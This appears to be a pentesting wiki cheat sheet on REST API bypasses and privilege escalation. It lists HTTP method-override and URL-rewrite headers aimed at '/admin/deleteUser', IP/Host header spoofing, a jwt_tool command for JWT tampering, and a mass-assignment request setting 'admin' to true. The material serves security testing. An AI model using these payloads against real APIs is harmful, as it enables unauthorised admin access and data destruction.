REST API - Bypasses and Privilege Escalations
REST API security testing
Methodology
Bypassing API filter and ACL by rewriting HTTP methods an URLs
X-HTTP-Method: PATCH
X-HTTP-Method-Override: PATCH
X-Http-Method-Override: PATCH
X-HTTP-Method-Override: PATCH
X-Http-Method: PATCH
X-HTTP-Method: PATCH
X-Method-Override: PATCH
X-Original-Method: PATCH
X-Original-URL: /admin/deleteUser
X-Rewrite-URL: /admin/deleteUser
Access Admin Interface
using HTTP headers rewriting trusted client's IP address or Hosts.
JWT Access Token Tampering
JWT Editor : Burp plugin
Available in BApp store, explore also advanced JWT header attacks https://portswigger.net/web-security/jwt#jwt-header-parameter-injections
JWT Tool
https://github.com/ticarpi/jwt_tool/wiki/Attack-Methodology
python3 ./jwt_tool.py -M pb -t http:/URL:5001/api/method -pd "{\"propertyId\": 29}" -rh "Authorization: Bearer <TOKEN>" -rh "Content-Type: text/json"
Mass Assignment
Observer object properties and try to set them (search for hidden parameters PARAMMINER)
POST /api/user/create
Host: server
Content-Type: application/json
{ "admin": true}
API Tester
Vulnerable API Project to practice with
Last updated
Was this helpful?